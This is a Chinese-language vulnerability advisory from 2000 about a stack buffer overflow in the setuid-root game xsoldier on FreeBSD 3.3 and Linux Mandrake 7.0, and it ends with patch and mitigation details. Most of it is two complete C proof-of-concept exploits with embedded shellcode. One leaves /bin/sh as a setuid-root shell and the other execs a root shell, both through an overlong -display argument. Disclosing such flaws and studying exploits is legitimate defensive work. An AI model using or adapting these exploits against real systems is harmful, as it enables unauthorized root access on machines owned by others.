
FreeBSD和 Linux Mandrake xsoldier缓冲溢出


发布时间:2000-09-15
更新时间:2000-09-15
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
FreeBSD FreeBSD 3.3;MandrakeSoft Linux Mandrake 7.0
详细描述
FreeBSD 3.3 和 Linux Mandrake 7.0 自带的 X11 游戏 xsoldier 以 setuid root 方式安装。该程序在处理 -display 命令行选项时没有检查参数长度,本地用户传入超长字符串即可触发基于栈的缓冲区溢出,覆盖函数返回地址并以 root 权限执行任意代码(下面的测试代码即通过 execl 向 -display 传递约 4400 字节的参数实现)。

测试代码
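/*
 * This listing holds TWO standalone proof-of-concept programs (each with its
 * own main); compile them separately. Both are historical (2000) local
 * privilege-escalation PoCs against a setuid-root xsoldier: they pass an
 * overlong "-display" argument so the copy into a fixed-size stack buffer
 * overwrites the saved return address. Return addresses are hard-coded or
 * guessed from %esp, so they are i386-specific and unlikely to work anywhere
 * but the authors' original systems.
 *
 * Reconstruction notes: the page was quoted-printable garbled ("=3D", soft
 * line breaks) and the <...> header names were stripped; both are restored.
 * Out-of-bounds writes/reads in the originals (see comments) are fixed
 * without changing the payload layout.
 */

/* ===================================================================== */
/* Exploit 1                                                             */
/* xsoldier exploit for FreeBSD-3.3-RELEASE                              */
/* Drops a suid root shell in /bin/sh                                    */
/* Brock Tellier btellier@usa.net                                        */
/* ===================================================================== */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * i386 FreeBSD shellcode credited to mudge@l0pht.com. The trailing "/tmp/ui"
 * is the path of the helper program it runs (built by buildui() below).
 * 67 bytes, no embedded NUL.
 */
char shell[] = /* mudge@l0pht.com */
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

/*
 * Source of the helper the shellcode executes: when run as root it chmods
 * /bin/sh to 04555 (setuid bit + r-xr-xr-x), leaving a setuid-root shell.
 */
#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

enum {
    BSIZE = 4400,   /* total length of the -display argument */
    NOP_LEN = 4325, /* length of the NOP sled that precedes the shellcode */
};

/*
 * Write CODE to /tmp/ui.c and compile it to /tmp/ui with the system cc.
 *
 * NOTE(review): both paths are fixed and created without O_EXCL, so another
 * local user could pre-create or race them; kept as in the original PoC.
 *
 * Returns 0 on success, -1 if the source could not be written or cc failed
 * (the original ignored both failures and went on to a useless exec).
 */
int buildui(void)
{
    FILE *fp = fopen("/tmp/ui.c", "w");
    if (fp == NULL) {
        perror("fopen /tmp/ui.c");
        return -1;
    }
    /* fputs rather than fprintf(fp, CODE): CODE is data, not a format string */
    if (fputs(CODE, fp) == EOF || fclose(fp) != 0) {
        perror("write /tmp/ui.c");
        return -1;
    }
    /* fixed command string, no user input reaches the shell */
    if (system("cc -o /tmp/ui /tmp/ui.c") != 0) {
        fprintf(stderr, "cc failed to build /tmp/ui\n");
        return -1;
    }
    return 0;
}

/*
 * Build [NOP sled][shellcode][return address...] and exec xsoldier with it
 * as the -display argument. argv[1], if present, is added to the guessed
 * return address (atoi: no validation, negative values allowed).
 */
int main(int argc, char *argv[])
{
    int offset = 0;
    uint32_t eip = 0xbfbfdb65; /* works for me (author's FreeBSD 3.3 box) */
    /* +1: the original declared buf[bsize] and then wrote buf[bsize] = '\0',
     * one byte past the end */
    char buf[BSIZE + 1];
    int x;

    if (buildui() != 0)
        return 1;

    if (argc > 1) {
        offset = atoi(argv[1]);
        eip += (uint32_t)offset; /* same two's-complement wrap as the original int math */
    }

    fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n");
    fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
    fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", (unsigned)eip, offset, BSIZE);

    memset(buf, 0x90, NOP_LEN);
    x = NOP_LEN;
    fprintf(stderr, "NOPs to %d\n", x);

    memcpy(buf + x, shell, sizeof shell - 1); /* 67 bytes, excluding the NUL */
    x += (int)(sizeof shell - 1);
    fprintf(stderr, "Shellcode to %d\n", x);

    /* little-endian return address */
    buf[x++] = (char)(eip & 0xff);
    buf[x++] = (char)((eip >> 8) & 0xff);
    buf[x++] = (char)((eip >> 16) & 0xff);
    buf[x++] = (char)(eip >> 24);
    fprintf(stderr, "eip to %d\n", x);

    /* The original left the last 4 bytes of the 4400-byte argument
     * uninitialized; repeat the return address there so the payload is
     * deterministic and never truncated by a stray NUL. */
    while (x + 4 <= BSIZE) {
        buf[x++] = (char)(eip & 0xff);
        buf[x++] = (char)((eip >> 8) & 0xff);
        buf[x++] = (char)((eip >> 16) & 0xff);
        buf[x++] = (char)(eip >> 24);
    }
    buf[BSIZE] = '\0';

    execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, (char *)NULL);
    perror("execl"); /* only reached if the exec failed */
    return 1;
}

/* ===================================================================== */
/* Exploit 2                                                             */
/* Larry W. Cashdollar linux xsolider exploit.                           */
/* lwc@vapid.dhs.org http://vapid.dhs.org                                */
/* if xsolider is built and installed from its source it will be         */
/* installed setuid root in /usr/local/games                             */
/* original exploit found by brock tellier for freebsd 3.3 ports         */
/* packages. If a setregid() call is placed in the shellcode, you can    */
/* get egid=12 with the default mandrake installation.                   */
/* ===================================================================== */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90  /* no operation, skip to next instruction. */
#define LEN 4480  /* our buffersize. */

/*
 * i386 Linux shellcode: execve with setreuid(0,0) and no '/' byte
 * (hellkit v1.1, per the original comment). Contains no 0x00 byte, so
 * strlen() gives its full length.
 */
char shellcode[] =
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
    "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
    "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
    "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
    "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
    "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
    "\xc2\x91";

/*
 * Return the current (32-bit) stack pointer; used as the base of the
 * return-address guess into the NOP sled. x86 only. The original had no
 * return statement and relied on the asm leaving the value in %eax, which
 * is undefined behavior in C; an output operand makes it explicit.
 */
long get_sp(void)
{
    uint32_t sp;
    __asm__ volatile ("mov %%esp, %0" : "=a" (sp));
    return (long)sp;
}

/*
 * Build [NOP sled][shellcode][return address x25] and exec xsoldier with it
 * as the -display argument. argv[1], if present, is an offset added to %esp.
 */
int main(int argc, char *argv[])
{
    /* +1: the original never NUL-terminated the argument, so execl read
     * past the end of the buffer until it happened to find a zero byte */
    char buffer[LEN + 1];
    size_t i;
    size_t sc_len = strlen(shellcode);
    int offset = 0;
    long retaddr = get_sp();
    uint32_t ra;

    if (argc > 1)
        offset = atoi(argv[1]);

    /* NOPs, leaving room for the shellcode and 100 bytes of return addresses */
    for (i = 0; i < LEN - sc_len - 100; i++)
        buffer[i] = NOP;
    /* [NNNNNNNNNNNNNNNNNNNNN                               ] */

    memcpy(buffer + i, shellcode, sc_len);
    i += sc_len;
    /* [NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS                ] */

    /* Fill the rest with the guessed address (esp + offset), 4 bytes at a
     * time. The original stored through (long *), which is 8 bytes on a
     * 64-bit host and wrote past the end of the buffer on the last slot. */
    ra = (uint32_t)(retaddr + offset);
    for (; i + 4 <= LEN; i += 4)
        memcpy(&buffer[i], &ra, sizeof ra);
    buffer[LEN] = '\0';
    /* [NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRR] */

    printf("Jumping to address %lx BufSize %d\n", retaddr + offset, LEN);
    execl("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, (char *)NULL);
    perror("execl"); /* only reached if the exec failed */
    return 1;
}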

解决方案
请安装以下补丁(前面的 32 位十六进制串为 MD5 校验值,仅用于核对下载是否完整,不能替代厂商签名验证):a3836c0ef3c2e7630d80e2426f03d6a9 xsoldier-0.96-13mdk.i586.rpm
0d79b8ab9cfc4278380537bfda8da6ba xsoldier-0.96-13mdk.src.rpm

Mandrake 用户可以到下面的 FTP 站点下载: http://www.linux-mandrake.com/en/ftp.php3 。上述补丁包仅针对 Linux Mandrake;FreeBSD 3.3 用户在获得修复版本之前,可去掉 /usr/X11R6/bin/xsoldier 的 setuid 位(或卸载该游戏)作为临时缓解。

相关信息